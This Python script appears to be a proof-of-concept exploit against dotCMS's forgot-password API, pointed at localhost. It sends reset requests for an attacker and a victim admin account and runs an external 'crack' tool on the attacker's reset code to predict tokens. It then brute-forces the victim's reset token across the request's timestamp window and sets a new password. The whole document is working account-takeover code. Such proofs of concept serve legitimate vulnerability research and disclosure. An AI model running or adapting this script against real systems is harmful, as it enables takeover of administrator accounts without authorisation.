import requests
import time
import urllib3
import subprocess


urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

base_url = "https://localhost:8443"
forgot_url = f"{base_url}/api/v1/forgotpassword"

# Step 1: Send request for nnajafli@andrew.cmu.edu
print("Step 1: Sending forgot password for attacker")
requests.post(forgot_url, json={"userId": "<user_email>"}, verify=False)

# Step 2: Send request for admin@dotcms.com and record times
print("Step 2: Sending forgot password for victim")
request_time = int(time.time() * 1000)
requests.post(forgot_url, json={"userId": "<user_email>"}, verify=False)
response_time = int(time.time() * 1000)
print(f"Request time: {request_time}")
print(f"Response time: {response_time}")

# Step 3: Wait for user input
code = input("\nEnter code: ").strip()

# Step 4: Run crack
print(f"\nStep 4: Running ./randomstringutils/crack -n 1 {code}")
subprocess.run(["./randomstringutils/crack", "-n", "1", code])

# Step 5: Read first line from out.txt
first_line = ""
print("Step 5: Reading out.txt")
with open("out.txt", "r") as f:
    first_line = f.readline().strip()
    print(f"First line: {first_line}")

# Step 6: Try tokens in loop
print(f"\nStep 6: Trying tokens from {request_time} to {response_time}")
change_password_url = f"{base_url}/api/v1/changePassword"

for timestamp in range(request_time, response_time + 1):
    time.sleep(1)
    token = f"{first_line}:{timestamp}"
    payload = {
        "password": "Aa12345678!",
        "token": token
    }

    
    try:
        response = requests.post(change_password_url, json=payload, verify=False, timeout=5)
        response_text = response.text
        # print(f"{payload=}")
        # print(f"Response: \n {response_text}")
        
        if "Invalid token" not in response_text:
            print(f"\nSuccess! Valid token found: {token}")
            print(f"Response: {response_text}")
            break
    except Exception as e:
        continue
else:
    print("\nNo valid token found in the time range")